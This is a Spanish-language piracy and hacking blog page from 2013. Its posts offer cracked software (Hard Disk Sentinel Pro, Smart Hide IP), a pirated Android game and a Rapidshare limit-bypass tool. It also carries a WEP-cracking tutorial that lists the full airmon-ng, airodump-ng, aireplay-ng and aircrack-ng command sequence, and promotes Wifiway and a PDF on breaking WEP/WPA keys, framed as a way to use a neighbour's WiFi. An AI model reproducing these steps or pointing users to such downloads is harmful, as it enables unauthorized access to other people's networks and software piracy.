Related Posts Plugin for WordPress, Blogger...

04 abril 2013

Visitas:

Hard Disk Sentinel Pro 4.30 Beta [Monitoreo y analisis a tu Disco Duro]






Hard Disk Sentinel – Una utilidad  el seguimiento y control de las unidades de . Identifica posibles , reducción del rendimiento y los posibles fallos. Puede avisar al usuario si detecta problemas o exceso de temperatura. Su potencial es evidente que no parece superfluo, especialmente en el caso de los valores especiales de los datos almacenados durante el crecimiento del volumen de . El programa supervisa el estado de los discos duros, incluyendo los indicadores de la temperatura y los parámetros de SMART (Self-Monitoring, Análisis y Tecnología de Información, una tecnología integrada en la mayoría de unidades modernas) para cada unidad de disco duro. Hard Disk Sentinel puede ser  para evitar daños graves o pérdida de datos.
El programa avisa al usuario si hay un problema antes de que suceda, y proporcionará una oportunidad de copia de  de datos importantes y valiosos. Hard Disk Sentinel se ejecuta en segundo plano y analiza continuamente el estado del disco duro. Si hay un error o de forma inesperada el comportamiento observado, el programa advierte al usuario sobre el estado actual. Por lo general, el disco duro poco a poco puede deteriorarse de día en día. La SMART-la tecnología ayuda a predecir una posible omisión de  de los valores críticos de la unidad. El programa también muestra la temperatura actual del disco duro y recuerda que la temperatura anterior, que se puede utilizar para comprobar la temperatura máxima a la alta carga de la unidad de disco duro.

Características:

- Funciona con las unidades a través de la interfaz IDE, Serial ATA y SCSI, determina el estado y la temperatura en modo real, las lecturas se muestran al instante, sin necesidad de un tiempo de diagnóstico, muestra la corriente y la temperatura mínima de almacenamiento, los atributos específicos en función de el , será de utilidad para  avanzados el tiempo de horas de funcionamiento y el  de errores de lectura / escritura e interpreta el valor del estado de SMART en el porcentaje de fácil comprensión;

- Con la ayuda de  especiales para los discos en el sistema muestra los valores básicos del Estado y utiliza el espacio, lo que simplifica el control;

- Muestra información sobre todos los aspectos del sistema, independientemente del número de unidades y en el futuro, estos datos se utilizan para la alerta automática y pantalla de estado.

Aquí están algunas características clave de “Hard Disk Sentinel Professional”:

· Fácil de usar interfaz
· Todos los datos se muestran en la ventana principal de la aplicación. controles rápidos permiten una fácil navegación para acceder a todos los discos duros, particiones y diferente información. Elementos de la interfaz intuitiva de usuario visualizar la información mediante el uso de verde / amarillo / rojo para indicar el nivel de problema. detallada descripción de texto y guías de ayuda sensible al contexto del usuario a través de las funciones y opciones.

• 1. Instalar más de 2. Configurar> 3. Manténgase protegido
· Apenas instalar, configurar alertas y opciones de copia de seguridad y su sistema es seguro. Se le notificará acerca de los problemas – pero si todo es correcto, Hard Disk Sentinel sólo se sienta en el estado de la bandeja y corriente. Los datos están protegidos incluso en 24 horas al día, 7 días a la semana.

· Instantánea S.M.A.R.T. analizar
- Hard Disk Sentinel puede comunicarse con el IDE, Serial ATA y discos duros SCSI para detectar su estado y la temperatura. estado del disco se muestran inmediatamente como que inicie la aplicación, no hay necesidad de analizar los discos para un largo período. Se muestra la temperatura actual y el máximo para el disco duro.
· estado de disco en Windows Explorer –
Ver el estado de salud actual y espacio utilizado en el Explorador de Windows o en cualquier otra aplicación, por lo que siempre sabrá la cantidad de espacio utilizado para cada particiones y el estado del disco.

· Información sobre la demanda -
Puede mostrar la temperatura actual del disco duro y la salud en la bandeja del sistema, en una pequeña ventana de estado y en el propio escritorio. Promedio y temperaturas máximas se registran para todos los discos duros y estas informaciones se muestran en los gráficos con fines estadísticos.

· Disco duro Detalles -
Detecta y muestra toda la información sobre el disco duro, desde el número de revisión y el tamaño del búfer a todas las funciones que tiene. Los modos de transferencia máxima disponible y la corriente también se muestran.

::Cambios en Hard Disk Sentinel Pro v4.30::

Improvements and new features, improved hardware support:
important update for hard disks / SSDs connected to motherboards with Intel chipsets
important update for multi-drive enclosures (port multiplier and RAID enclosures)
important update for various SSDs (Corsair Force GT SSDs, Samsung SSDs, etc.)
display progress (% complete) on application button during hard disk surface test
improved support of VANTEX HX4R, Chieftec, Sans Digital external RAID enclosures
improved support for LSI SAS/SATA RAID controllers and DELL SAS/SATA RAID controllers
improved support and health detection for various Seagate hard disks, for example Seagate Thin hard disks and Seagate hard disks with special firmware
improved support for Areca RAID controllers, accessing hard disks and SSDs in different connected enclosures, displaying enclosure number and slot number
improved support of JMicron JMB36X / Gigabyte GBB36X / HighPoint / VIA RAID controllers under Windows 2003
added support for newer WD hard disk (WD RED, WD Enterprise RE, etc.)
support of HighPoint 4522 RAID controller: detecting and displaying connected SATA hard disks (standalone and configured as RAID)
Bug fixes, further modifications:

fixed periodic false alarms reported by older Intel chipset drivers (providing invalid S.M.A.R.T. information)
fixed invalid S.M.A.R.T. information reported by LSI SAS RAID controllers for standalone (non-RAID) SATA drives
fixed display of volume labels in hard disk selector (upper left area) if one or more partitions have no assigned logical drive letter
general improvements for Chinese language, fixed hard disk temperature symbol in Sidebar Gadget when Chinese language used
fixed warranty check for Samsung hard disk drives
fixed startup problem with Drobo enclosures / devices
improved real time performance graph display
improved and more stable dynamic DNS update function





Visitas:

Hackear contraseña de WiFi con "Backtrack 4"







Este muy bien hecho video tutorial (disponible en HD!)demuestra lo simple que es conseguir la contraseña de una red WiFi (que esté utilizando WEP), con el  Backtrack




Los  necesarios, los encontrarán aquí
http://www.backtrack-linux.org
http://www.imgburn.com
Necesitarán también un disco en blanco  poder correr el programa (es un ISO)

Mientras que los comandos utilizados, son estos:
 
Startx
/etc/init.d/networking 
airmon-ng
airmon-ng  [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename] 


Visitas:

RapidHacker v4.5 Immortality Edition







El Rapid hacker puede hackear/crackear/el límite de espera de Rapidshare.com y de Rapidshare.de. Entre otros  de 
-Copie y pegue sus enlaces de Rapidshare y consiga transferencias directas ilimitadas. 
-libre de  y 


What's new in v4.5: 
- Changed the way the Browser functions 
- Changed the way Integrity checking works 
- Added new integrity checking check points 
- Added new client information in the Help section 
- Repaired ripv5.php because Samair.ru patched the old version 
- Included  "SWF" extension blocking, in case I go "Live" - They are registry entries 
- Fixed invalid Homepage url in Websites console 
- Fixed Runtime Error 5 in Refresh procedure 
- Fixed Colon bug, so you now not need the Patch as with v4.2 
- Client will Crash if lastline is selected in spoofer property, and I won't fix it. 
- Made Custom CGI script modification [Host it yourself] in the CGI spoofer 
- Removed AOL statistic options due to AOL terminating Hometown.aol.com 
- Wrote how the Proxy Dead or Alive requests pings, so only lives for 4 requests.

Contraseña: computer-0wnez.blogspot.mx

Visitas:

Smart Hide IP v2.6.7.2 [Oculta fácilmente tu IP]






Smart Hide IP es tu elección si quieres: cambiar tu dirección IP, navegar por de forma anónima, visitar sitios bloqueados regionalmente, aumentar su privacidad y seguridad en línea, protegerse contra piratas informáticos, gestionar un cortafuegos, enviar mensajes de correo electrónico anonimos, proteger su  cuando se conecta a sitios públicos de acceso inalámbrico; bloqueo de espionaje ISP, ocultar su IP mientras chatea, etc.
Principales Beneficios
Proxy seguro
Cada dirección IP que usted ve es útil, rápida y segura al 100%!
Interfaz fácil de usar
Un solo clic y está listo  ocultar su dirección IP real sin necesidad de ninguna configuración.
Dirección IP dinámica
Funciona con lotes

Smart Hide IP v2.6.7.2

6.2 MB | Inglés | Cracked | I-Filez


descargar ABAJO:


Visitas:

Cracking Wifi al Completo







¿Deseas comprobar si la red WiFi que tienes montada en tu casa es realmente segura? ¿En tu  saben que eres un hacha en esto de la informática y te han pedido que realices una auditoría de su red inalámbrica? ¿O simplemente no puedes costearte una conexión ADSL puesto que tus recursos son limitados y tienes la suerte de tener a tu alcance la red  que tu vecino ha instalado hace apenas unos meses?
Cualquiera que sea tu situación, el objetivo de este artículo es la recopilación de todos los métodos conocidos hasta la actualidad para lograr descubrir la contraseña de todas aquellas redes wifi que puedes alcanzar con tu tarjeta inalámbrica. PERO TE ADVIERTO si lo que haces es legal o no, es responsabilidad tuya.

Introducción:
¿Qué tiene este artículo que lo diferencia con cualquier otro que puedas encontrar en la red?. Casi todos los artículos o reseñas que puedas encontrar a lo largo de  sólo se centran en un método para hacer cierta tarea y casi siempre se resume a lo siguiente:

* Utiliza airodump(-ng) para capturar paquetes.
* Utiliza aircrack(-ng) para romper la clave.

Quizás con un posible: Utiliza aireplay(-ng) para inyectar paquetes. ¿Pero qué pasa cuando te encuentras en una situación en que no todo sale como debería? Cuando una red apenas produce paquetes, cuando no tiene clientes conectados o un sin  de inconvenientes que limitan tus armas…
Pues aquí te mostraremos diversas formas de seguir consiguiendo contraseñas aun a pesar de enfrentarte a todas estas dificultades. Aquí reuniremos todo aquello que se puede encontrar en los foros más dispersos de la telaraña global, y agregaremos todos los links necesarios a cualquier  que sea mencionada.
Este artículo se centra sobre el  operativo Linux, aunque haremos referencias en su momento al resto. Normalmente todos los programas o scripts presentados, salvo contadas excepciones, pueden ser ejecutados en ambos . Recuerda que un ejecutable de  puede correr bajo Linux por medio de Wine.
Cracking Wifi al Completo, Todos los metodos para descubrir las claves de redes Wifi
Autor: David Puente Castro
Formato: PDF
Numero de Paginas: 11
Tamaño del rar: 6.26 Mb
Hosting: Multiple servidor
Uploader: 0wnez
pass: i-Like Descargas


TusFiles.net






Visitas:

Need For Speed Most Wanted [Android]






BÚSCATE PROBLEMAS, SÉ EL MÁS BUSCADO. 
Escapa de un  de policía implacable mientras te enfrentas a pilotos callejeros. Pilota y persigue coches coches de ensueño como el SRT Viper GTS, el  911  S, el Hummer H1 Alpha y muchos otros. Siente la intensidad de unas  callejeras en las que frenar es de débiles gracias a daños realistas que afectan a todo el , por primera vez en una plataforma .

DEJA TU MARCA
Inicia sesión en Origin para ver cómo evoluciona la lista de Most Wanted y averigua quién es el Most Wanted en las diversas  y de entre tus amigos. A continuación, desafía a tus amigos y da muestras de tu pericia al en una competición constante y sin interrupciones.

ACELERA DE DON NADIE A MOST WANTED…
• Pilota y personaliza más de 40 de los coches más emocionantes del mundo.
• ¡Compite a tu manera! En respuesta a las peticiones de los , ahora podrás girar el volante mediante la  táctil o inclinando el dispositivo.
• Usa modificaciones para mejorar tu coche y ponerte a la cabeza del pelotón.
• Vive la acción gracias a increíbles gráficos y los intensos daños que afectan a todo el vehículo.
• Gana Speed Points para desbloquear coches.
• Tunea tu móvil con un exclusivo fondo de pantalla dinámico de Most Wanted
Tus rivales harán cuanto puedan para evitar que llegues a lo más alto... pero en este mundo  hay lugar para un Most Wanted.

DESCARGAR abajo:

Visitas:

Wifiway 3.4 Rompe claves internet WIFI WEP WPA Y WPA2 [+manual]






Hola visitantes de Computer-0wnez como saben siempre les trago lo mas actualizado en  de todo tipo tutoriales y demas pues hoy les trigo este Live  que rompe cualquier tipo de clave.

EL WIFIWAY 3.4 100% EFECTIVO  ROMPER CLAVES DE INTERNET COMO SON LAS WIFI WEP Y LAS MUY MENCIONADAS WPA Y WPA2

EN EL ARCHIVO DE  ENCONTRARAN LA IMAGEN ISO Y EL  MANUAL PASO A PASO CON CADA UNA WIFI - WEP - WPA Y WPA2 EL TUTORIAL BIENE MUY BIEN EXPLICADO...

Nueva version de WifiWay con todas las novedades incluidas, es una distribución LIVE CD (se ejecuta desde el CD) para la auditoria de redes inalambricas, con la cual puedes conseguir las claves de las redes WIFI que veas desde tu LAPTOP ó PC (PCs con Antena wifi).

La novedad principal es la actualizacion del escritorio a una version superior y compatible con Kde4, con nuevas y actualizadas librerias que hacen la distro mas y rapida, con menus ampliados y opciones nuevas para adaptar y modificar el entorno grafico, y mas actualizaciones.

Se le ha quitado la opcion de elegir idiomas en el  y entra directamente en modo grafico, el escritorio y el teclado siguen siendo multilenguaje spanish/english.

Arreglado y actualizado el  Subversion para actualizar programas online que antes no se podian.

El  ha sido probado y funciona 100% e incluye manual de uso.


Contraseña: computer-0wnez.blogspot.mx